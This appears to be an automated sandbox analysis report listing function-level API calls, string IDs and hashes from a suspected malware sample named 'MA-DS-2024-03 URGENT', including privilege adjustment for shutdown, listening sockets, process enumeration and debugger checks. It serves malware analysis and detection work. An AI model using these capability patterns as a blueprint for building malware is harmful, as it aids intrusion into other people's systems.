                                                        • Opcode ID: 1e684558f03312bb52afcfb7bee4740275ae5e0db51e4f3ae7f1dcda7164c3be
                                                        • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                        • Opcode Fuzzy Hash: 1e684558f03312bb52afcfb7bee4740275ae5e0db51e4f3ae7f1dcda7164c3be
                                                        • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                        APIs
                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                        • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                        • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                        • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                        • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • _memmove.LIBCMT ref: 00450258
                                                        • _memmove.LIBCMT ref: 0045036D
                                                        • _memmove.LIBCMT ref: 00450414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                        • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                          • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        APIs
                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0046C432
                                                        • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • CoUninitialize.OLE32 ref: 0046C6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 016B1459
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 016B1463
                                                        • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 016B1470
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: de637b46676b8b5378ee275a9e15054317773931a312c21bfbcb9cadeb7fb001
                                                        • Instruction ID: 2177c3efa3f43ffa5886b37d2eca14ba0e9fe34f8e419668a8cca9ae81ca3248
                                                        • Opcode Fuzzy Hash: de637b46676b8b5378ee275a9e15054317773931a312c21bfbcb9cadeb7fb001
                                                        • Instruction Fuzzy Hash: BD31B275D01229ABCB21DF68DD887D8BBB8AF08710F5041DAE41DA7250EB349BC58F55
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                        • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                        • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                        • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                        • GetLastError.KERNEL32 ref: 00458865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 12411f26038180c23832c0c29c0add3e4f81e4a72dbb589e912bb1f6addabebf
                                                        • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                        • Opcode Fuzzy Hash: 12411f26038180c23832c0c29c0add3e4f81e4a72dbb589e912bb1f6addabebf
                                                        • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                        • FreeSid.ADVAPI32(?), ref: 0045879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                        • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                        • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                        • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000003,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002,00000000,?,016B2038,00000003), ref: 016B3F5E
                                                        • TerminateProcess.KERNEL32(00000000,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002,00000000,?,016B2038,00000003), ref: 016B3F65
                                                        • ExitProcess.KERNEL32 ref: 016B3F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: 3669050d4469ecdd7a2c49992ba4810ac14968727817fba70814efe741dd71c7
                                                        • Instruction ID: f3ea9bc4edcc9c06445a424bb16c870e89544011b8778c581cd3209842b60257
                                                        • Opcode Fuzzy Hash: 3669050d4469ecdd7a2c49992ba4810ac14968727817fba70814efe741dd71c7
                                                        • Instruction Fuzzy Hash: 0EE04F31104508ABCF116F9CDC88A993B7EFB44282F004018F94587221CB35DCD2CB44
                                                        APIs
                                                        • __time64.LIBCMT ref: 0046889B
                                                          • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                          • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID: 0eL
                                                        • API String ID: 2893107130-3167399643
                                                        • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                        • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                        • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                        • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                        • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
